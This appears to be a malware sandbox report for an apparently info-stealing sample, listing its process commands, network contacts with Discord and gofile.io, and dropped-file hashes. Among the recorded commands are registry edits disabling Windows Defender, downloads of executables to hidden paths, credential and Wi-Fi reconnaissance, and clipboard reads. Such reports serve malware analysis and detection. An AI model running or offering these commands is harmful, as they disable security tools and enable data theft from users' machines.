reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f

C:\Windows\system32\curl.exe

curl -L --silent "بتحط هنا رابط باتشك" --output "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

cmd.exe /c chcp

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Get-Clipboard

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\cmd.exe

cmd.exe /c chcp

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\HOSTNAME.EXE

hostname

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get caption,description,providername

C:\Windows\system32\net.exe

net user

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user

C:\Windows\system32\query.exe

query user

C:\Windows\system32\quser.exe

"C:\Windows\system32\quser.exe"

C:\Windows\system32\net.exe

net localgroup

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\net.exe

net user guest

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user guest

C:\Windows\system32\net.exe

net user administrator

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator

C:\Windows\System32\Wbem\WMIC.exe

wmic startup get caption,command

C:\Windows\system32\tasklist.exe

tasklist /svc

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\system32\ROUTE.EXE

route print

C:\Windows\system32\ARP.EXE

arp -a

C:\Windows\system32\NETSTAT.EXE

netstat -ano

C:\Windows\system32\sc.exe

sc query type= service state= all

C:\Windows\system32\netsh.exe

netsh firewall show state

C:\Windows\system32\netsh.exe

netsh firewall show config

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yqzb5d1s\yqzb5d1s.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB054.tmp" "c:\Users\Admin\AppData\Local\Temp\yqzb5d1s\CSCF6F01569631D4B3ABC3A426DD969DFBA.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

Network

Country  Destination            Domain              Proto
US       8.8.8.8:53             ip-api.com          udp
US       208.95.112.1:80        ip-api.com          tcp
N/A      127.0.0.1:50080        -                   tcp
N/A      127.0.0.1:50101        -                   tcp
N/A      127.0.0.1:50106        -                   tcp
US       8.8.8.8:53             discord.com         udp
US       162.159.138.232:443    discord.com         tcp
US       162.159.138.232:443    discord.com         tcp
N/A      127.0.0.1:50118        -                   tcp
N/A      127.0.0.1:50120        -                   tcp
US       8.8.8.8:53             api.gofile.io       udp
FR       51.75.242.210:443      api.gofile.io       tcp
US       8.8.8.8:53             store1.gofile.io    udp
FR       45.112.123.227:443     store1.gofile.io    tcp
N/A      127.0.0.1:50285        -                   tcp
N/A      127.0.0.1:50287        -                   tcp
US       8.8.8.8:53             tse1.mm.bing.net    udp
US       150.171.28.10:443      tse1.mm.bing.net    tcp
US       150.171.28.10:443      tse1.mm.bing.net    tcp
US       150.171.28.10:443      tse1.mm.bing.net    tcp
US       150.171.28.10:443      tse1.mm.bing.net    tcp
US       150.171.28.10:443      tse1.mm.bing.net    tcp
US       162.159.138.232:443    discord.com         tcp
US       162.159.128.233:443    discord.com         tcp
US       8.8.8.8:53             c.pki.goog          udp
GB       142.250.179.227:80     c.pki.goog          tcp

Files

memory/5492-0-0x0000000000010000-0x000000000123E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Exela.exe

MD5 c5669d422429ecf07edc2f00821ecd93
SHA1 8da6ff8a15bd667719a72aa3ac5af33fb1c640c3
SHA256 3ade121ba195ca8e6e37aaeb84152e735b89cdd68f0a14b787c4d0d3f7351e00
SHA512 d686372bacc27848c093012b64791a956cb3cd3bc915b65949d0cf4056e0317763d4dd3abf3b75ee55c968ee43e821a17796999a7978dde85d9e9133610a1253

C:\Users\Admin\AppData\Local\Temp\no defender.exe

MD5 c80d2a00b97cf55170b221f8a8f65e81
SHA1 a03c17751d8db91e1e66460093855dabbcfcc04b
SHA256 af69ac0bc29db1b5bc7957411de2f49469525e32dbf76932d93489021f2bfe85
SHA512 48b54cfe518b77a83957f7e1edad3ea09bc18f79ad24158b79345f1d29810e805340e74cc5b33effb081959502b7ea305fe1e0035450e2ecd03e6c5307b92879

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

C:\Users\Admin\AppData\Local\Temp\_MEI15562\ucrtbase.dll

MD5 3b337c2d41069b0a1e43e30f891c3813
SHA1 ebee2827b5cb153cbbb51c9718da1549fa80fc5c
SHA256 c04daeba7e7c4b711d33993ab4c51a2e087f98f4211aea0dcb3a216656ba0ab7
SHA512 fdb3012a71221447b35757ed2bdca6ed1f8833b2f81d03aabebd2cd7780a33a9c3d816535d03c5c3edd5aaf11d91156842b380e2a63135e3c7f87193ad211499

C:\Users\Admin\AppData\Local\Temp\_MEI15562\python311.dll

MD5 db09c9bbec6134db1766d369c339a0a1
SHA1 c156d9f2d0e80b4cf41794cd9b8b1e8a352e0a0b
SHA256 b1aac1e461174bbae952434e4dac092590d72b9832a04457c94bd9bb7ee8ad79
SHA512 653a7fff6a2b6bffb9ea2c0b72ddb83c9c53d555e798eea47101b0d932358180a01af2b9dab9c27723057439c1eaffb8d84b9b41f6f9cd1c3c934f1794104d45

C:\Users\Admin\AppData\Local\Temp\_MEI15562\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

memory/6092-119-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7D1F.tmp\7D20.tmp\7D21.bat

MD5 bffa0b357688d06c9f66c79a5d091f8b
SHA1 bc20d3a70777c646a86e5c4b98f3a038f0821106
SHA256 d2e461a8175a5a964e2012329e72b339c43386e9ded1bb742fd7233400a9c9df
SHA512 36f23e89943ea250ee71ee832e55e3eba396ede87689e6f0fce478118cdf46ef4b06f068c2ca24e128a3cfc242119794411dc930e3d67434598410fc50cce903

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_howav04c.czx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4380-129-0x000002A9799C0000-0x000002A9799E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI15562\base_library.zip

MD5 65089bae0fe6af0f4d44313a26c87f16
SHA1 18449f77a946a7aadc7edf19c82006d22aaa487c
SHA256 d204f68e076e4662bc8a585ff8cdfe3f0fc602ecc2e2f12afbe23b25425869d8
SHA512 0c710bcaa747debdee12fa181afdeba6b24b77280b07d65cfeacc6a7d327c7af6f8c559e01701d65f5219197ea756df023b6b04ed826ea31f27f74cb776b1618

C:\Users\Admin\AppData\Local\Temp\_MEI15562\libffi-8.dll

MD5 decbba3add4c2246928ab385fb16a21e
SHA1 5f019eff11de3122ffa67a06d52d446a3448b75e
SHA256 4b43c1e42f6050ddb8e184c8ec4fb1de4a6001e068ece8e6ad47de0cc9fd4a2d
SHA512 760a42a3eb3ca13fa7b95d3bd0f411c270594ae3cf1d3cda349fa4f8b06ebe548b60cd438d68e2da37de0bc6f1c711823f5e917da02ed7047a45779ee08d7012

memory/6092-182-0x00007FFF68650000-0x00007FFF6865F000-memory.dmp

memory/6092-183-0x00007FFF62E20000-0x00007FFF62E39000-memory.dmp

memory/6092-185-0x00007FFF625A0000-0x00007FFF625B9000-memory.dmp

memory/6092-184-0x00007FFF62620000-0x00007FFF6264D000-memory.dmp

memory/6092-181-0x00007FFF62650000-0x00007FFF62674000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI15562\select.pyd

MD5 c39459806c712b3b3242f8376218c1e1
SHA1 85d254fb6cc5d6ed20a04026bff1158c8fd0a530
SHA256 7cbd4339285d145b422afa280cee685258bc659806be9cf8b334805bc45b29c9
SHA512 b727c6d1cd451d658e174161135d3be48d7efda21c775b8145bc527a54d6592bfc50919276c6498d2e2233ac1524c1699f59f0f467cc6e43e5b5e9558c87f49d

C:\Users\Admin\AppData\Local\Temp\_MEI15562\pyexpat.pyd

MD5 fe0e32bfe3764ed5321454e1a01c81ec
SHA1 7690690df0a73bdcc54f0f04b674fc8a9a8f45fb
SHA256 b399bff10812e9ea2c9800f74cb0e5002f9d9379baf1a3cef9d438caca35dc92
SHA512 d1777f9e684a9e4174e18651e6d921ae11757ecdbeb4ee678c6a28e0903a4b9ab9f6e1419670b4d428ee20f86c7d424177ed9daf4365cf2ee376fcd065c1c92d

C:\Users\Admin\AppData\Local\Temp\_MEI15562\libssl-1_1.dll

MD5 6cd33578bc5629930329ca3303f0fae1
SHA1 f2f8e3248a72f98d27f0cfa0010e32175a18487f
SHA256 4150ee603ad2da7a6cb6a895cb5bd928e3a99af7e73c604de1fc224e0809fdb0
SHA512 c236a6ccc8577c85509d378c1ef014621cab6f6f4aa26796ff32d8eec8e98ded2e55d358a7d236594f7a48646dc2a6bf25b42a37aed549440d52873ebca4713e

C:\Users\Admin\AppData\Local\Temp\_MEI15562\libcrypto-1_1.dll

MD5 86cfc84f8407ab1be6cc64a9702882ef
SHA1 86f3c502ed64df2a5e10b085103c2ffc9e3a4130
SHA256 11b89cc5531b2a6b89fbbb406ebe8fb01f0bf789e672131b0354e10f9e091307
SHA512 b33f59497127cb1b4c1781693380576187c562563a9e367ce8abc14c97c51053a28af559cdd8bd66181012083e562c8a8771e3d46adeba269a848153a8e9173c

memory/6092-209-0x00007FFF52680000-0x00007FFF527F3000-memory.dmp

memory/6092-208-0x00007FFF62DF0000-0x00007FFF62E13000-memory.dmp

memory/6092-207-0x00007FFF63600000-0x00007FFF6360D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-utility-l1-1-0.dll

MD5 5f936491b052a832af3e509664cdbb14
SHA1 901bfc680eb6944457c961c2b1f7acfc22bbeb5b
SHA256 a7f53b76e7ea837f45bdb8712a864fb0c427c5eb863d155a72b422b96417ea10
SHA512 6a8e7a80b162b5d7e512c7a5419dcd07832f929af2a79c74640fd7ef0189c50ccf78c8afa9678afc95152e56e92f7e7e86a2612b0f63e03989839dcd7153db2a

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-time-l1-1-0.dll

MD5 2710cc3c97a43f2c4280a1483e69eac3
SHA1 853fd337682bd1122118a686f51bc265bf778a48
SHA256 554b506ca648507f10eeb5bae124ff91594f5fdd81d33b0171334be7ad5c7816
SHA512 eefceaae770f417901124790a6aecc95ca294f533554b861d6d34c5c0748a2a90bf16b8ff32dbbda3049b32f607cca24d2db32b040faf616bbf64369c5579b33

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-string-l1-1-0.dll

MD5 73beb313800b1c4967a4dec481da0bf9
SHA1 933a189d028066ff08fa78ac8058916fc7892998
SHA256 9636be82c51d61dd990504d786fac0d51d41f73d22700a18d4fbbfcf6da5dff5
SHA512 0fa631e9543dbea34aee3aab1295a1c373457dd1e2649478ef5d4d15b877979eec0d73cf4a5dd87e85c8a308265092d6d98ae97196e8caaa0f35a9a627243c99

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-stdio-l1-1-0.dll

MD5 c6fab38852d8b71a62e4b6c6b1ecd733
SHA1 11aa6f21614dae9727e6d0e5cec339553f482be8
SHA256 1516552690d6a38d65a8016d889f2ce1515649be6a45ef82cbed08a73690a7b4
SHA512 8f04946369104fe6d092fcece49856a4b11ab92396ca4d2126355178db15becbf9db887d1ce53294849ddf6b77e263a43ee68242e9fa079f44ecee14a39e133b

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-runtime-l1-1-0.dll

MD5 28ca7ca918e132822c47024beb65c30f
SHA1 a27a45c473582d368bcf4e9faf21f02e43689ae8
SHA256 1d7d6e883472eb5ddafe383adbaa5f8ed7b9d6267e7ade971bbff47ec4b47935
SHA512 d26cb0f7c0bde5a6e5ceb8a37e763a40d159e38be74993a42f10091515b179a716e4e64289db4631a6a0b41a8ba5395540a16fba0e342f0f4d984bded021a87b

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-process-l1-1-0.dll

MD5 5acf4b9d3487d85f2e204aead39d5664
SHA1 e5bd8492d65da2969914d41ee09609b6c47818be
SHA256 a7433b9f8965f914da00dda4ede62d4db69f561a548cbc8d312293d0917a33c7
SHA512 e93c8daa7ad9ce7055438bc787fced6e0a3233dcabb2edb643d3a35779d65778337b798225437971674fdd30d8bc6dd7ac7eb0f550d4c8caf99436de877b2fbe

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-math-l1-1-0.dll

MD5 407d577907e199daec931d09f3ca202e
SHA1 bfb05663117b49715a2e31ae7f0c38aaec5fa152
SHA256 98e8728908f2872819728e709291529bac39751dec7d01c03a175c4688b9c233
SHA512 d5d76cfb0b572379655032156028a284b946368bbf4930d4318298caf2091ba2d364999849b53bc22bfc09d5e75943d921bccd902ceb38c0a14a7083035f898d

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-locale-l1-1-0.dll

MD5 93afd2a53dfa4aa1e35ea615d76b6c01
SHA1 22c4550b96fd30dd64b214d6246e9458c1c699c2
SHA256 31fc3b5665c3bb2006496b5cbb0e5667b186263a867dbe5a760a996305f4f514
SHA512 979bf81c2cbbc19e2cf13e6871cec24fa1b9f1fa06e15cfade74dc211032053a3b8622ffc9a6dde86134a01f18140250f438797ac5acbe340a361213702e7277

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-heap-l1-1-0.dll

MD5 60d8195416792fa2ac327445912d352d
SHA1 d53c3c2e9e0106c95c02632fdd093cfd01ae9900
SHA256 d7fab15f2d1298a11822ce5c7756da2eab1112bd3561b22db6b25a5a8acafad6
SHA512 470ee830ae66ad3331a5a928dcbc2f6865064c1c494a36747fa92ea2a328bbe2da917d1ab8374d16b1ea9002879757b34c4bd6afa2226d7d1a922fe1b34e0461

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 6e6a258763888c7a49491a39868be3db
SHA1 7867377f30bc3744be4a0f1b265ef3a5ed0ecc00
SHA256 d9fc17ce5dd5aecac0dca2d9a17a20271a13f68cd6cfa89163d72904a72f6b8a
SHA512 97ec6626e64c52d98ea0d6897a5bd4cd3ea5639c37a406119e2d7579e2951b156eb9f8dd62b76ffb79ae7bf6678aa21c9073f759d8de4acc3b575a9f98c6782b

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-environment-l1-1-0.dll

MD5 e6b9e39476a87a611524331549c7ec47
SHA1 36513f3c137a5b1e8d195f833ba0a381f3f61f7a
SHA256 b84f44a882b2caa6d0bc3c01e8d012e881324b800fd39e2728fecdc65315a245
SHA512 865f3e9c519b67f5e9cb5fdfc9ec148e90a5c37ab78506356364712aa0b320a25558544b1e814629be92617666a1676d16ceccdd4dce2f6d11ed3d08eb582ef6

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-convert-l1-1-0.dll

MD5 aa4189a2860aa4a59a1d09c41566b014
SHA1 e24414e590f40ea8e4c40067193da5610e64e165
SHA256 1f818ccd44865c7c91c1ee5df7d21dc17840601d7470c0d1a486c5874304edd2
SHA512 738943f74bc506a9c6bfa478bf31fdefdbed740a8f1fdfe40ae78257c920f25bf76ae4f3c1a2e4157d77cfe0c12c641e81091a7f507ee404abf3201cfe80d4b9

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-conio-l1-1-0.dll

MD5 8fac4c0488e4734b9b3df2006caeabb2
SHA1 783c1c210c67e7f23ba6a9e41f7999ab67e1fcfc
SHA256 bf651fcd0f10dc528caa3168abd6ea528458c78aaa75b93b3c615d5a18567192
SHA512 0f5c3f097a5785a68bf4688a9b5975fdf90e180d3287d67ab600fab16ec146a3330916b89e81162c335ca578bfcf6e1f9bed1653c61a20abf7a7e58d08310fa2

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-util-l1-1-0.dll

MD5 175fc9b538e4d6d13d07acc4383c907c
SHA1 d27d5890bb3d50f0a40bdf17685f49d529b01a12
SHA256 edd387b01cb9d85a44e27e656e5ea6898b8e9604682db29cb87ee3236f3a1d9f
SHA512 195c78ac1175b87bc0422ac706c671616e2c1fcb373e28210682d775bf875227b9b31c6fd16a4fb901a3a4e9d9b5b0a8067497d71f104d01cbccda37567ab046

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-timezone-l1-1-0.dll

MD5 5543fb8a912a0c9317589ea420cdd914
SHA1 a1431fd32f29fa2e6e6e04156764dbb70b7ec8b7
SHA256 bd4e40b2f5d0f60feceeb7622166e1a61fb34ac2cd5484e1d9826c7cffa3029c
SHA512 405ab712e9fc0ca7e318ffe8585bb7eb7d3c93ae56d9468ee7c81b91e7ae1c7bcaa03d4cd884abd4229f45cc65bd4f85c53bbb0bdc4cb1ecd53b06d3d199e1e4

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-sysinfo-l1-1-0.dll

MD5 f5cb1600d1cd61c17394556805818f20
SHA1 f7be7748bd8d32638fa253c7a8933dfc6a4e0f56
SHA256 e92ce06aa782a4e50a5bc95da5ac5ded0dc3da7e1152078002a12367aa7cc1af
SHA512 4e4e3a27635d19f55760b27986bd5fab8a0c56ae26c5e35e9a7e4c48a543a36d9f05990292b9d83410d16061d79dda3de208389b78a13cca83aa272239f834eb

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-synch-l1-2-0.dll

MD5 34e5600f2244f5d0b00f00d9cd0d83b5
SHA1 dde2f5e6f4d6847ec16c0b5e368f0256a08307ce
SHA256 2d04920e410d81e3a044a76724a23cf892b23a5b382fb079abd6f689199c7428
SHA512 3d7b013793bfe1da1caf1e312451fc1bb0de53deb3a2a7d227830d4e52571de2433a4e695b3116ed3129a9d96e93a307b2bb16a317050d0bd8ea88bfc7ebc4ac

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-synch-l1-1-0.dll

MD5 0a5e0f886c97c23ba862520aa624c745
SHA1 a3a8434e9578b09d1b4f63bd992e8a4fa79ed177
SHA256 882edcaa7b39dc9e330d1b3dcb2a770be2404d6358d76cf4cf5e52231bedac60
SHA512 8b5df45e2827492e703564ee0731beba221a1faa7137aa980991f9e7d66b50916c26025d9157bd54bfc5c0b2ea6b04507247140bb5cc6d7d6a52fed34c794a4b

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-string-l1-1-0.dll

MD5 0e34f7b6f4edb70c972772d4c3820c4e
SHA1 561329c9c81aa0b4f5d2b278cd97cdb32f42d238
SHA256 c9103f6afdd8a6fea734da372911b0a3b018a84e00675a9355ea6f091e641781
SHA512 07e9d0cc5e5b4850adb5aa83466b7acd6854a6e8e230ad8e5eb63a4bc52ec1ed24536ddff025d8a65cccd8e00df326ea9338bfea30abb2942fca3979ca30c642

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-rtlsupport-l1-1-0.dll

MD5 a63de0416788e90cab093393edccb1b3
SHA1 9d1f572ea39403916703864a690fe9c3affbbe5a
SHA256 02fd3b0adf86967b6fc133797c12fa9ee8d0cf64778b5ca937b56e86ac726343
SHA512 06a257fbfb7e70ea2f55789b258a29fb7df5bc1d5baf195da2fd4d03a96e3e634565f8b762e7f76376cefba500de71dba114fbb661ac70ba7a16ab6b149abbe6

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-profile-l1-1-0.dll

MD5 bf23831af3f7be93a8026b66a8c920ab
SHA1 07efccb8cc2cf29f40d54caf358559a31b99c46c
SHA256 cac8fb2938ed80bd7eed42e3c68dead6cb41c30cfb567f23085986422f1a2747
SHA512 b8937b1c4039f2e08088f92d2a491c76c6720a0072c92b261ee3b8ce403a4cb6c5a6bedfded93414b6212e6a5a943c78e15a32c0c603e6741c1d5d76554d1c39

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-processthreads-l1-1-1.dll

MD5 17aa74d08778d62a946f62f0ca9583d3
SHA1 06dea29dd28457783b753be4e28cb16fe6eb1e2a
SHA256 5c566535a9ac607fa99a665ab246ffb78767995dde86c4a9a5c518dd22b76e56
SHA512 dd69d76b2ac8524049d1ae23b241c25846a3f1f1a93e6884ce4acf2d3a9fa3ee94777a9924183b5b3a3b9de9008a3896bb88195c4e82c22d5a7f17e785dd8500

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-processthreads-l1-1-0.dll

MD5 ede66c159083ab6ec6d00a30d65fd13a
SHA1 2ea70c9681fa09647b69554c4b0e335446f4565a
SHA256 42f88e44e488a74af796e8c2a2548879764a40e554f35d1deb8eaff5def09e20
SHA512 c667e4658828f9df3a37e233994eab5f8dcb06542b68afe3a5ec520a30d09d2d8a4b76959777697a288a0eef90ab7b4b128c5e8193339118957f43e4e38c70ee

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-processenvironment-l1-1-0.dll

MD5 c4a0a79a0dcd0b407df304501c33ccd5
SHA1 5e1dfa5e98634cad712d2711be3d3f0e5a671b95
SHA256 3add350dcd79c64a98e47adf733f26c9fdf47df097b060f04f067cdaf32e99cc
SHA512 acb737c371ff7ef187ad0ba0eb1c2d29aa7ae8d546ff74f998fbe6081349c8fc21b05b6c3b55a9cc28b9765161e50fffa0ea7af4a83f6c5ad34183c0cf10b582

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-namedpipe-l1-1-0.dll

MD5 e06db624dc643c0f8d9c1b640960689a
SHA1 b1bf5159bb1aa7ed30288e5db4b8146be874c072
SHA256 245cf5d5abc866d5ce327c4a1524ae3954ccfc9a7284c817fa15962695e6b6fa
SHA512 a8176dad7540cb5ea8017ddd66626a3172fc2b22404d5bead434b60bb9df28c190ea51892df333fdec5e08819cf3bda3280096c930807cf0d375e5c6b0506c44

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-memory-l1-1-0.dll

MD5 a63629924496dfc53245605c47563798
SHA1 0452471b1024711f99891340300657ec8d38fa75
SHA256 9c5ea7a7e943c65da3aeff4da33b47fc4a3becea2f7a0b6aa2b632cd6d8b4632
SHA512 072c2407224aba338dfb0c65fbdce30ee368f76fcc7d96f1e44d68a8ba98dae3647cfa3d4e1c51be8116fec210fdc36251c5f72d40ec5bb7b91e965f90aded72

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-localization-l1-2-0.dll

MD5 578f22f3cfe28f68f21b4665d90d0fd5
SHA1 e4e3887f2f63eed765e4df6d65e2d599a94079db
SHA256 e4011458af1397e26d0b233cbb2fa661faa6dae7b7a9541e9311c8af1ecb5e48
SHA512 14902536b9325afa8e376458137373e22d7a6898164575be73c08ecd08df381a6dff1878e6995ee6956224a5a3f6df3746ae149f82e30bb136986c386ed4c792

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 2a2e22f35b83aab6db3d7b27c5af1953
SHA1 5531e1b2899d52cf44d92a521db503cfab6beb26
SHA256 425e4ebee71347295e36776d415611d451e2a51b451df57da23ed8f8fb4664e8
SHA512 269c09638fd5308d1719cb7af9132e0d158318a1b76a9a16495619ca6dbb8f1370af0d76fc709ea9c6f14064390161cda19f53ad240dc646b065ab8056e3049a

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-interlocked-l1-1-0.dll

MD5 ee5bb5fc7b94b7413b9f4ade5dcd404e
SHA1 6d615205f7d44cf0a77e7d943d33a2915bd636d8
SHA256 22cf7040d9cb3dc79d941a6bbe4cebd5beaa1355d6e424843e6970404281e61e
